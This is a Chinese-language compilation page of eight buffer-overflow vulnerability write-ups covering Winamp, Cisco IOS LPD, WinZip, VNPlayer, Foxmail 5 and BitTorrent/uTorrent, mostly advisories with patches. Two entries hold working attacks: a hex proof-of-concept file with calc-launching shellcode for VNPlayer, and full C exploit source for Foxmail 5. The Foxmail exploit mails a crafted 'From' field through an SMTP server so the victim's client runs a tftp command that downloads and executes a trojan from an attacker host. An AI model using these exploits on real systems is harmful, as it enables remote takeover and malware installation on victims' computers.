Winamp 5.34a 安全补丁修补缓冲区溢出漏洞

时间：2023-05-09 07:53:38 其他范文收藏本文下载本文

以下是小编收集整理的Winamp 5.34a 安全补丁修补缓冲区溢出漏洞，本文共8篇，仅供参考，欢迎大家阅读。

篇1：Winamp 5.34a 安全补丁修补缓冲区溢出漏洞

Winamp 5.34a Security Patch包含一个经过修补的in_mp4.dll (v1.22) ,修复了在一些情况下播放 MP4 文件产生缓冲区溢出的漏洞,这一缺陷可能会导致内存溢出,引起未经允许的代码执行,如果您没有安装MP4和M4A的支持,那么就不需要安装这个补丁.

下载:Winamp 5.34a Security Patch

篇2：IOS LPD远程缓冲区溢出漏洞

Cisco IOS的LPD服务在处理超长的设备名时存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制设备或导致设备拒绝服务，行式打印机服务（LPD）用于在Cisco IOS中提供打印服务。如果IOS中配置了LPD守护程序的话，该服务会监听于默认的LPD端口TCP 515。如果任何非515的源TCP端口进行连接时，就会显示以下错误：

$ telnet 172.30.3.101 515

Trying 172.30.3.101...

Connected to 172.30.3.101 (172.30.3.101).

Escape character is '^]'.

hostname_of_the_router: /usr/lib/lpd: Malformed from address

如果主机名大于等于99个字符的话，就会由于调用sprintf函数而导致溢出，

尽管技术上是栈溢出，但由于IOS为进程栈分配堆内存，因此所覆盖的内存实际为堆。由于堆内存用作了栈，在出现溢出时主机名可以覆盖存储在字符缓冲区开始之前的返回地址，但由于某些原因在缓冲区到达堆块边界处的red zone之前不会出现崩溃，因此在出现崩溃和路由器重启后，内存dump显示的是堆破坏。

必须要控制主机名才能利用这个漏洞。如果设备上在运行SNMP且知道rw团体字符串（通常为默认值private），就可以如下设置主机名：

$ snmpset -Os -c private -v 1 10.0.0.1 system.sysName.0 s long_hostname

建议：

临时解决方法：

* 使用no printer命令禁用LPD服务。

* 配置访问列表限制对TCP 515端口的访问。

篇3：Winzip存在多个缓冲区溢出漏洞

Winzip存在多个缓冲区溢出漏洞

受影响系统：

WinZip 3.x

WinZip 6.x

WinZip 7.x

WinZip 8.x

WinZip 9.x

漏洞描述：

Winzip存在多个潜在安全漏洞，可危及用户系统安全，

1) 一些未明漏洞可导致缓冲溢出，

利用这些漏洞可能导致执行任意代码。

2) 一个问题导致事由于未正确确认命令行参数，通过使用特殊构建的参数可导致缓冲溢出和可能执行任意代码漏洞。

补丁下载：

www.winzip.com/upgrade.htm

热门推荐：苹果专题、时尚专题

点击阅读更多学院相关文章>>

分享到

篇4：VNPlayer缓冲区溢出

程序对.apl文件的内容未作校验，传入恶意文件导致缓冲区溢出，执行任意代码，

poc文件的内容：

0x53, 0x74, 0x61, 0x72, 0x74, 0x20, 0x42, 0x6C,

0x6F, 0x63, 0x6B, 0x3D, 0x20, 0x46, 0x69, 0x6E,

0x69, 0x73, 0x68, 0x20, 0x42, 0x6C, 0x6F, 0x63,

0x6B, 0x3D, 0x5B, 0x4D, 0x6F, 0x6E, 0x6B, 0x65,

0x79, 0x27, 0x73, 0x20, 0x41, 0x75, 0x64, 0x69,

0x6F, 0x20, 0x49, 0x6D, 0x61, 0x67, 0x65, 0x20,

0x4C, 0x69, 0x6E, 0x6B, 0x20, 0x46, 0x69, 0x6C,

0x65, 0x5D, 0x49, 0x6D, 0x61, 0x67, 0x65, 0x20,

0x46, 0x69, 0x6C, 0x65, 0x3D, 0x5C, 0x41, 0x41,

0x41, 0x41, 0x7E, 0x46, 0x41, 0x41, 0x41, 0x7E,

0x4B, 0x41, 0x41, 0x41, 0x7E, 0x50, 0x41, 0x41,

0x41, 0x7E, 0x55, 0x41, 0x41, 0x41, 0x7E, 0x5A,

0x41, 0x41, 0x41, 0x7E, 0x35, 0x41, 0x41, 0x41,

0x7E, 0x30, 0x41, 0x41, 0x41, 0x7E, 0x25, 0x41,

0x41, 0x41, 0x7E, 0x29, 0x41, 0x41, 0x41, 0x7E,

0x43, 0x42, 0x41, 0x41, 0x7E, 0x48, 0x42, 0x41,

0x41, 0x7E, 0x4D, 0x42, 0x41, 0x41, 0x7E, 0x52,

0x42, 0x41, 0x41, 0x7E, 0x57, 0x42, 0x41, 0x41,

0x7E, 0x32, 0x42, 0x41, 0x41, 0x7E, 0x37, 0x42,

0x41, 0x41, 0x7E, 0x40, 0x42, 0x41, 0x41, 0x7E,

0x26, 0x42, 0x41, 0x41, 0x7E, 0x2B, 0x42, 0x41,

0x41, 0x7E, 0x45, 0x43, 0x41, 0x41, 0x7E, 0x4A,

0x43, 0x41, 0x41, 0x7E, 0x4F, 0x43, 0x41, 0x41,

0x7E, 0x54, 0x43, 0x41, 0x41, 0x7E, 0x59, 0x43,

0x41, 0x41, 0x7E, 0x34, 0x43, 0x41, 0x41, 0x7E,

0x39, 0x43, 0x41, 0x41, 0x7E, 0x24, 0x43, 0x41,

0x41, 0x7E, 0x28, 0x43, 0x41, 0x41, 0x7E, 0x42,

0x44, 0x41, 0x41, 0x7E, 0x47, 0x44, 0x41, 0x41,

0x7E, 0x4C, 0x44, 0x41, 0x41, 0x7E, 0x51, 0x44,

0x41, 0x41, 0x7E, 0x56, 0x44, 0x41, 0x41, 0x7E,

0x31, 0x44, 0x41, 0x41, 0x7E, 0x36, 0x44, 0x41,

0x41, 0x7E, 0x21, 0x44, 0x41, 0x41, 0x7E, 0x5E,

0x44, 0x41, 0x41, 0x7E, 0x5F, 0x44, 0x41, 0x41,

0x7E, 0x44, 0x45, 0x41, 0x41, 0x7E, 0x49, 0x45,

0x41, 0x41, 0x7E, 0x4E, 0x45, 0x41, 0x41, 0x7E,

0x53, 0x45, 0x41, 0x41, 0x7E, 0x58, 0x45, 0x41,

0x41, 0x7E, 0x33, 0x45, 0x41, 0x41, 0x7E, 0x38,

0x45, 0x41, 0x41, 0x7E, 0x23, 0x45, 0x41, 0x41,

0x7E, 0x2A, 0x45, 0x41, 0x41, 0x7E, 0x41, 0x46,

0x41, 0x41, 0x7E, 0x46, 0x46, 0x41, 0x41, 0x7E,

0x4B, 0x46, 0x41, 0x41, 0x7E, 0x50, 0x46, 0x41,

0x41, 0x7E, 0x55, 0x46, 0x41, 0x41, 0x7E, 0x5A,

0x46, 0x41, 0x41, 0x7E, 0x35, 0x46, 0x41, 0x41,

0x7E, 0x30, 0x46, 0x41, 0x41, 0x7E, 0x25, 0x46,

0x41, 0x41, 0x7E, 0x29, 0x46, 0x41, 0x41, 0x7E,

0x43, 0x47, 0x41, 0x41, 0x7E, 0x48, 0x47, 0x41,

0x41, 0x7E, 0x4D, 0x47, 0x41, 0x41, 0x7E, 0x52,

0x47, 0x41, 0x41, 0x7E, 0x57, 0x47, 0x41, 0x41,

0x7E, 0x32, 0x47, 0x41, 0x41, 0x7E, 0x37, 0x47,

0x41, 0x41, 0x7E, 0x40, 0x47, 0x41, 0x41, 0x7E,

0x26, 0x47, 0x41, 0x41, 0x7E, 0x2B, 0x47, 0x41,

0x41, 0x7E, 0x45, 0x48, 0x41, 0x41, 0x7E, 0x4A,

0x48, 0x41, 0x41, 0x7E, 0x4F, 0x48, 0x41, 0x41,

0x7E, 0x54, 0x48, 0x41, 0x41, 0x7E, 0x59, 0x48,

0x41, 0x41, 0x7E, 0x34, 0x48, 0x41, 0x41, 0x7E,

0x39, 0x48, 0x41, 0x41, 0x7E, 0x24, 0x48, 0x41,

0x41, 0x7E, 0x28, 0x48, 0x41, 0x41, 0x7E, 0x42,

0x49, 0x41, 0x41, 0x7E, 0x47, 0x49, 0x41, 0x41,

0x7E, 0x4C, 0x49, 0x41, 0x41, 0x7E, 0x51, 0x49,

0x41, 0x41, 0x7E, 0x56, 0x49, 0x41, 0x41, 0x7E,

0x31, 0x49, 0x41, 0x41, 0x7E, 0x36, 0x49, 0x41,

0x41, 0x7E, 0x21, 0x49, 0x41, 0x41, 0x7E, 0x5E,

0x49, 0x41, 0x41, 0x7E, 0x5F, 0x49, 0x41, 0x41,

0x7E, 0x44, 0x4A, 0x41, 0x41, 0x7E, 0x49, 0x4A,

0x41, 0x41, 0x7E, 0x4E, 0x4A, 0x41, 0x41, 0x7E,

0x53, 0x4A, 0x41, 0x41, 0x7E, 0x58, 0x4A, 0x41,

0x41, 0x7E, 0x33, 0x4A, 0x41, 0x41, 0x7E, 0x38,

0x4A, 0x41, 0x41, 0x7E, 0x23, 0x4A, 0x41, 0x41,

0x7E, 0x2A, 0x4A, 0x41, 0x41, 0x7E, 0x41, 0x4B,

0x41, 0x41, 0x7E, 0x46, 0x4B, 0x41, 0x41, 0x7E,

0x4B, 0x4B, 0x41, 0x41, 0x7E, 0x50, 0x4B, 0x41,

0x41, 0x7E, 0x55, 0x4B, 0x41, 0x41, 0x7E, 0x5A,

0x4B, 0x41, 0x41, 0x7E, 0x35, 0x4B, 0x41, 0x41,

0x7E, 0x30, 0x4B, 0x41, 0x41, 0x7E, 0x25, 0x4B,

0x41, 0x41, 0x7E, 0x29, 0x4B, 0x41, 0x41, 0x7E,

0x43, 0x4C, 0x41, 0x41, 0x7E, 0x48, 0x4C, 0x41,

0x41, 0x7E, 0x4D, 0x4C, 0x41, 0x41, 0x7E, 0x52,

0x4C, 0x41, 0x41, 0x7E, 0x57, 0x4C, 0x41, 0x41,

0x7E, 0x32, 0x4C, 0x41, 0x41, 0x7E, 0x37, 0x4C,

0x41, 0x41, 0x7E, 0x40, 0x4C, 0x41, 0x41, 0x7E,

0x26, 0x4C, 0x41, 0x41, 0x7E, 0x2B, 0x4C, 0x41,

0x41, 0x7E, 0x45, 0x4D, 0x41, 0x41, 0x7E, 0x4A,

0x4D, 0x41, 0x41, 0x7E, 0x4F, 0x4D, 0x41, 0x41,

0x7E, 0x54, 0x4D, 0x41, 0x41, 0x7E, 0x59, 0x4D,

0x41, 0x41, 0x7E, 0x34, 0x4D, 0x41, 0x41, 0x7E,

0x39, 0x4D, 0x41, 0x41, 0x7E, 0x24, 0x4D, 0x41,

0x41, 0x7E, 0x28, 0x4D, 0x41, 0x41, 0x7E, 0x42,

0x4E, 0x41, 0x41, 0x7E, 0x47, 0x4E, 0x41, 0x41,

0x7E, 0x4C, 0x4E, 0x41, 0x41, 0x7E, 0x51, 0x4E,

0x41, 0x41, 0x7E, 0x56, 0x4E, 0x41, 0x41, 0x7E,

0x31, 0x4E, 0x41, 0x41, 0x7E, 0x36, 0x4E, 0x41,

0x41, 0x7E, 0x21, 0x4E, 0x41, 0x41, 0x7E, 0x5E,

0x4E, 0x41, 0x41, 0x7E, 0x5F, 0x4E, 0x41, 0x41,

0x7E, 0x44, 0x4F, 0x41, 0x41, 0x7E, 0x49, 0x4F,

0x41, 0x41, 0x7E, 0x4E, 0x4F, 0x41, 0x41, 0x7E,

0x53, 0x4F, 0x41, 0x41, 0x7E, 0x58, 0x4F, 0x41,

0x41, 0x7E, 0x33, 0x4F, 0x41, 0x41, 0x7E, 0x38,

0x4F, 0x41, 0x41, 0x7E, 0x23, 0x4F, 0x41, 0x41,

0x7E, 0x2A, 0x4F, 0x41, 0x41, 0x7E, 0x41, 0x50,

0x41, 0x41, 0x7E, 0x46, 0x50, 0x41, 0x41, 0x7E,

0x4B, 0x50, 0x41, 0x41, 0x7E, 0x50, 0x50, 0x41,

0x41, 0x7E, 0x55, 0x50, 0x41, 0x41, 0x7E, 0x5A,

0x50, 0x41, 0x41, 0x7E, 0x35, 0x50, 0x41, 0x41,

0x7E, 0x30, 0x50, 0x41, 0x41, 0x7E, 0x25, 0x50,

0x41, 0x41, 0x7E, 0x29, 0x50, 0x41, 0x41, 0x7E,

0x43, 0x51, 0x41, 0x41, 0x7E, 0x48, 0x51, 0x41,

0x41, 0x7E, 0x4D, 0x51, 0x41, 0x41, 0x7E, 0x52,

0x51, 0x12, 0x45, 0xFA, 0x7F, 0x51, 0x41, 0x41,

0x7E, 0x32, 0x51, 0x41, 0x41, 0x31, 0xD2, 0x52,

0x68, 0x63, 0x61, 0x6C, 0x63, 0x89, 0xE6, 0x52,

0x56, 0x64, 0x8B, 0x72, 0x30, 0x8B, 0x76, 0x0C,

0x8B, 0x76, 0x0C, 0xAD, 0x8B, 0x30, 0x8B, 0x7E,

0x18, 0x8B, 0x5F, 0x3C, 0x8B, 0x5C, 0x1F, 0x78,

0x8B, 0x74, 0x1F, 0x20, 0x01, 0xFE, 0x8B, 0x4C,

0x1F, 0x24, 0x01, 0xF9, 0x42, 0xAD, 0x81, 0x3C,

0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xF5, 0x0F,

0xB7, 0x54, 0x51, 0xFE, 0x8B, 0x74, 0x1F, 0x1C,

0x01, 0xFE, 0x03, 0x3C, 0x96, 0xFF, 0xD7, 0xCC

拖拽poc文件到可执行程序

漏洞触发，启动了calc

篇5：缓冲区溢出技术

缓冲区溢出技术基础为了提高大家的技术水平，为了更了解我们讨论的这种技术，为了把这个论坛建成一个更更好的论坛，下面我为大家推出一系列完整的有关溢出，溢出攻击的文章，

缓冲区溢出技术

，

让大家更能了解到这个天天说但又不太清楚怎么回事的东西。我想，看了这个以后大家

篇6：Foxmail 5远程缓冲区溢出漏洞漏洞预警

注：本文是2月xfocus成员在内部技术交流中提出的，在此之前，启明星辰技术人员已经发现这一漏洞，但未公开细节，xfocus成员听说存在这一漏洞后对Foxmail进行分析，并写出利用代码，

测试环境：win2k sp4+foxmail 5.0.300

以前测试foxmail 4.x的时候曾经发现过溢出漏洞，不过后来一直没时间研究就先放下了，后来听说Foxmail5也有溢出，但是一直没有看见公布。于是没事的时候干脆自己研究一下，测试后发现以前的溢出漏洞已经补上了，不过出了一个新的漏洞。

问题出在PunyLib.dll里面的UrlToLocal函数，估计这是一个用来处理垃圾邮件的链接库，当一封邮件被判定为垃圾邮件时，就会调用UrlToLocal来处理邮件体的“From: ”字段，处理过程中发生堆栈溢出，可以导致执行任意代码。

具体处理过程如下：

.text:10002040 public UrlToLocal

.text:10002040 UrlToLocal proc near

.text:10002040

.text:10002040 arg_0 = dword ptr 4

.text:10002040 arg_4 = dword ptr 8

.text:10002040

.text:10002040 mov eax, dword_1000804C

.text:10002045 mov ecx, dword_10008030

.text:1000204B mov edx, [esp+arg_4]

.text:1000204F push offset aHttp ; “”

.text:10002054 push eax

.text:10002055 mov eax, [esp+8+arg_0]

.text:10002059 push offset unk_10008034

.text:1000205E push ecx

.text:1000205F push edx

.text:10002060 push eax

.text:10002061 call sub_10002070 ;调用10002070，其中参数里保存的是邮件体的“From: ”字段后面的内容

.text:10002070 sub_10002070 proc near ; CODE XREF: UrlToLocal+21p

.text:10002070 ; EmailAdrToLocal+107p

.text:10002070

.text:10002070 var_600 = dword ptr -600h

.text:10002070 var_500 = dword ptr -500h

.text:10002070 var_400 = dword ptr -400h

.text:10002070 var_300 = dword ptr -300h

.text:10002070 var_200 = dword ptr -200h

.text:10002070 var_100 = dword ptr -100h

.text:10002070 arg_0 = dword ptr 4

.text:10002070 arg_4 = dword ptr 8

.text:10002070 arg_8 = dword ptr 0Ch

.text:10002070 arg_C = dword ptr 10h

.text:10002070 arg_10 = dword ptr 14h

.text:10002070 arg_14 = dword ptr 18h

.text:10002070

.text:10002070 mov edx, [esp+arg_0]

.text:10002074 sub esp, 600h

......

.text:100020DF push eax

.text:100020E0 push ecx

.text:100020E1 push ebx

.text:100020E2 call sub_10001A30 ;调用10001A30，就是这个函数里面溢出了

.text:10001A30 sub_10001A30 proc near ; CODE XREF: sub_10002070+72p

.text:10001A30 ; sub_10002290+95p

.text:10001A30

.text:10001A30 var_104 = dword ptr -104h

.text:10001A30 var_100 = dword ptr -100h

.text:10001A30 arg_0 = dword ptr 4

.text:10001A30 arg_4 = dword ptr 8

.text:10001A30 arg_8 = dword ptr 0Ch

.text:10001A30 arg_C = dword ptr 10h

.text:10001A30 arg_10 = dword ptr 14h

.text:10001A30 arg_14 = dword ptr 18h

.text:10001A30

.text:10001A30 sub esp, 104h ;分配0x104字节大小的堆栈，但是拷贝的“From: ”字段最大为0x200

.text:10001A36 push ebx

.text:10001A37 mov ebx, [esp+108h+arg_0]

.text:10001A3E push ebp

.text:10001A3F mov ebp, [esp+10Ch+arg_10]

.text:10001A46 push esi

.text:10001A47 xor esi, esi

......

.text:10001AA9 sub edi, ecx

.text:10001AAB mov eax, ecx

.text:10001AAD mov esi, edi

.text:10001AAF mov edi, edx

.text:10001AB1 shr ecx, 2

.text:10001AB4 rep movsd ;这里进行内存拷贝的时候溢出了，按照“From: ”字段大小拷贝到0x104的缓冲区里

.text:10001AB6 mov ecx, eax

.text:10001AB8 and ecx, 3

.text:10001ABB rep movsb

......

.text:10001AE7 mov edi, [esp+114h+arg_C]

.text:10001AEE shr ecx, 2

.text:10001AF1 rep movsd ;这里有几处地方会对局部变量进行操作，因为这些变量都被覆盖了，所以需要把他们覆盖成可以写的地址，我覆盖的是0x7ffdf220这个地址，应该是PEB的区域，所以必须在后面shellcode里面把这个区域的内容恢复成0

.text:10001AF3 mov ecx, eax

.text:10001AF5 and ecx, 3

.text:10001AF8 rep movsb

......

.text:10001BD7 pop edi

.text:10001BD8 pop esi

.text:10001BD9 pop ebp

.text:10001BDA pop ebx

.text:10001BDB add esp, 104h

.text:10001BE1 retn ;返回的时候就会回到我们的JMP ESP地址去

这个溢出无法覆盖SEH，而且字符串里面不能包含“@,(,,,\r,\n”这些乱七八糟的字符。shellcode用的是ey4s写的用URLMON下载并运行exe文件的那个。

有些MAIL服务器会把shellcode截断，所以我又改了一下，用比较短的shellcode直接运行tftp来下载程序并运行，测试了一下成功率比原来有所提高，但是容易被防火墙给拦截下来。

/* fmx.c - x86/win32 Foxmail 5.0 PunyLib.dll remote stack buffer overflow exploit

* (C) COPYRIGHT XFOCUS Security Team,

* This is unpublished proprietary source code of XFOCUS Security Team.

* It should not be distributed in any form. without express permission

* from XFOCUS Security Team.

* -----------------------------------------------------------------------

* Author : xfocus

* : www.xfocus.org

* Maintain : XFOCUS Security Team

* Version : 0.2

* Test : Windows server GB/XP professional

* + Foxmail 5.0.300.0

* Notes : unpublished vul.

* Greets : ey4s, and all member of XFOCUS Security Team.

* Complie : cl fmx.c

* Usage : fmx

* mail_addr: email address we wantto hack

* tftp_server: run a tftp server and have a a.exe trojan

* smtp_server: SMTP server don't need login, we send the email thru it

* Date : 2004-02-27

* Revised : 2004-03-05

* Revise History:

* -03-05 call WinExec addr of Foxmail.exe module to run tftp for down&execute

#include

#pragma comment (lib,“ws2_32”)

//mail body, it's based on a real spam email, heh

unsigned char packet[] =

“From: %s\r\n” //buffer to overrun

“Subject: Hi,man\r\n”

“MIME-Version: 1.0\r\n”

“Content-Type: multipart/mixed; boundary=\”87122827\“\r\n”

“\r\n”

“--87122827\r\n”

“Content-Type: text/plain; charset=us-ascii\r\n”

“Content-Transfer-Encoding: 7bit\r\n”

“\r\n”

“T\r\n”

“\r\n”

“--87122827\r\n”

“Content-Disposition: attachment\r\n”

“Content-Type: Text/HTML;\r\n”

“ name=\”girl.htm\“\r\n”

“Content-Transfer-Encoding: 7bit\r\n”

“\r\n”

“--87122827--\r\n”

“\r\n”

“.\r\n”;

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.300)

unsigned char winexec[] =

“\x83\xec\x50\xeb\x0c\xb9\x41\x10\xd3\x5d\xc1\xe9\x08\xff\x11\xeb\x08\x33\xdb\x53\xe8\xec\xff\xff\xff”;

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)

unsigned char winexec2[] =

“\x83\xec\x50\xeb\x0c\xb9\x41\x10\xa3\x5d\xc1\xe9\x08\xff\x11\xeb\x08\x33\xdb\x53\xe8\xec\xff\xff\xff”;

#define SMTPPORT 25

int Make_Connection(char *address,int port,int timeout);

int SendXMail(char *mailaddr, char *tftp, char *smtpserver, char *shellcode);

int main(int argc, char * argv[])

{

WSADATA WSAData;

char *mailaddr = NULL;

char *tftp = NULL;

char *smtpserver = NULL;

if(argc!=4)

{

printf(“Usage: %s \ne.g.:%s eeye@hack.com 202.2.3.4 219.3.2.1\n”, argv[0], argv[0]);

return 1;

}

mailaddr=argv[1];

tftp=argv[2];

smtpserver=argv[3];

if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)

{

printf(“WSAStartup failed.\n”);

WSACleanup();

exit(1);

}

//WinExec() address

SendXMail(mailaddr, tftp, smtpserver, winexec); //WinExec() address in Foxmail.exe module(foxmail 5.0.300)

SendXMail(mailaddr, tftp, smtpserver, winexec2); //WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)

WSACleanup();

return 0;

}

// 建立TCP连接

// 输入:

// char * address IP地址

// int port 端口

// int timeout 延时

// 输出:

// 返回:

// 成功 >0

// 错误 <=0

int Make_Connection(char *address,int port,int timeout)

{

struct sockaddr_in target;

SOCKET s;

int i;

DWORD bf;

fd_set wd;

struct timeval tv;

s = socket(AF_INET,SOCK_STREAM,0);

if(s<0)

return -1;

target.sin_family = AF_INET;

target.sin_addr.s_addr = inet_addr(address);

if(target.sin_addr.s_addr==0)

{

closesocket(s);

return -2;

}

target.sin_port = htons(port);

bf = 1;

ioctlsocket(s,FIONBIO,&bf);

tv.tv_sec = timeout;

tv.tv_usec = 0;

FD_ZERO(&wd);

FD_SET(s,&wd);

connect(s,(struct sockaddr *)&target,sizeof(target));

if((i=select(s+1,0,&wd,0,&tv))==(-1))

{

closesocket(s);

return -3;

}

if(i==0)

{

closesocket(s);

return -4;

}

i = sizeof(int);

getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);

if((bf!=0)||(i!=sizeof(int)))

{

closesocket(s);

return -5;

}

ioctlsocket(s,FIONBIO,&bf);

return s;

}

//send magic mail

int SendXMail( char *mailaddr, char *tftp, char *smtpserver, char *shellcode)

{

SOCKET csock;

int ret,i=0;

char buf[510], sbuf[0x10000], tmp[500], tmp1[500];

csock = Make_Connection(smtpserver, SMTPPORT, 10);

if(csock<0)

{

printf(“connect err.\n”);

exit(1);

}

memset(buf, 0, sizeof(buf));

ret=recv(csock, buf, 4096, 0);

if(ret<=0)

{

printf(“recv err.\n”);

exit(1);

}

printf(buf);

ret=send(csock, “HELO server\r\n”,strlen(“HELO server\r\n”), 0);

if(ret<=0)

{

printf(“send err.\n”);

exit(1);

}

memset(buf, 0, sizeof(buf));

ret=recv(csock, buf, 4096, 0);

if(ret<=0)

{

printf(“recv err.\n”);

exit(1);

}

printf(buf);

ret=send(csock, “MAIL FROM: info@sina.com\r\n”,strlen(“MAIL FROM: info@sina.com\r\n”), 0);

if(ret<=0)

{

printf(“send err.\n”);

exit(1);

}

memset(buf, 0, sizeof(buf));

ret=recv(csock, buf, 4096, 0);

if(ret<=0)

{

printf(“recv err.\n”);

exit(1);

}

printf(buf);

sprintf(tmp, “RCPT TO: %s\r\n”, mailaddr);

ret=send(csock, tmp,strlen(tmp), 0);

if(ret<=0)

{

printf(“send err.\n”);

exit(1);

}

memset(buf, 0, sizeof(buf));

ret=recv(csock, buf, 4096, 0);

if(ret<=0)

{

printf(“recv err.\n”);

exit(1);

}

printf(buf);

Sleep(1000);

ret=send(csock, “DATA\r\n”,strlen(“DATA\r\n”), 0);

if(ret<=0)

{

printf(“send err.\n”);

exit(1);

}

memset(buf, 0, sizeof(buf));

ret=recv(csock, buf, 4096, 0);

if(ret<=0)

{

printf(“recv err.\n”);

exit(1);

}

printf(buf);

printf(“send exploit mail...\n”);

memset(sbuf, 0, sizeof(sbuf));

memset(buf, 0, sizeof(buf));

memset(buf, 0x41, sizeof(buf)-1);

memset(tmp, 0, sizeof(tmp));

//strcpy(tmp, winexec);//WinExec() address in Foxmail.exe module(foxmail 5.0.300)

strcpy(tmp, shellcode);//WinExec() address in Foxmail.exe module

strcat(tmp, “cmd /c tftp -i %s get a.exe&a.exe:”);

sprintf(tmp1, tmp, tftp);

memcpy(buf+0x100-strlen(tmp1), tmp1, strlen(tmp1));

*(int *)(buf+0x100)=0x7ffa54cd; //ret addr jmp esp

*(int *)(buf+0x104)=0x80eb80eb; //jmp back

*(int *)(buf+0x108)=0x7ffdf220; //writeable addr

*(int *)(buf+0x110)=0x7ffdf220; //writeable addr

memcpy(buf, “girl\x0d”, 5);

sprintf(sbuf, (char *)packet, buf);

ret=send(csock, sbuf,strlen(sbuf), 0);

if(ret<=0)

{

printf(“send err.\n”);

exit(1);

}

memset(buf, 0, sizeof(buf));

ret=recv(csock, buf, 4096, 0);

if(ret<=0)

{

printf(“recv err.\n”);

exit(1);

}

printf(buf);

printf(“exploit mail sent.\n”);

closesocket(csock);

return 0;

}

安全焦点

篇7：BitTorrent和uTorrent Peers 窗口缓冲区溢出漏洞

这是应用较广的客户端问题

受影响系统：

BitTorrent BitTorrent <= 6.0 (build 5535)

BitTorrent uTorrent <= 1.8-alpha-7834

BitTorrent uTorrent <= 1.7.5 (build 4602)

不受影响系统：

BitTorrent uTorrent 1.7.6 (build 7859)

描述：

BitTorrent和uTorrent都是流行的bittorrent协议客户端，使用了相同的代码库，

BitTorrent和uTorrent的实现上存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制用户客户端，

BitTorrent和uTorrent客户端都在General部分中启用了Detailed Info窗口，用于报告有关所使用的torrent和tracker的状态信息。在General同一窗口中的Peers部分显示有关所连接客户端的信息，如共享torrent使用率、IP地址等。当用户查看这个窗口的时候，会通过wcscpy函数将所连接客户端软件版本的unicode字符串拷贝到相对静态的缓冲区，以便在GUI中显示。如果该字符串超长的话，就可能触发缓冲区溢出，导致拒绝服务或执行任意指令如果要利用这个漏洞，外部攻击者必须要连接到客户端所打开的随机端口，然后发送当前所使用torrent的超长客户端版本和SHA1哈希。

厂商补丁：

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

download.utorrent.com/1.7.6/utorrent.exe